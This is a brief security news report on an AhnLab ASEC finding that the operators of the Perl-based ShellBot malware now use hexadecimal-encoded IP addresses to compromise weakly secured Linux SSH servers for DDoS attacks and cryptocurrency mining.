ShellBot’s threat actors use IP addresses converted to hexadecimal notation to infiltrate poorly maintained Linux SSH servers and deliver DDoS malware. “The overall flow remains the same, but the download URL used by the threat actor to install ShellBot has changed from a regular IP address to a hexadecimal value,” according to a new study issued today by the AhnLab Security Emergency Response Center (ASEC).
ShellBot, also known as PerlBot, is reported to employ a dictionary attack to compromise servers with weak SSH credentials, with the malware acting as a conduit to orchestrate DDoS attacks and deliver cryptocurrency miners. The malware, written in Perl, communicates with a command-and-control (C2) server via the IRC protocol.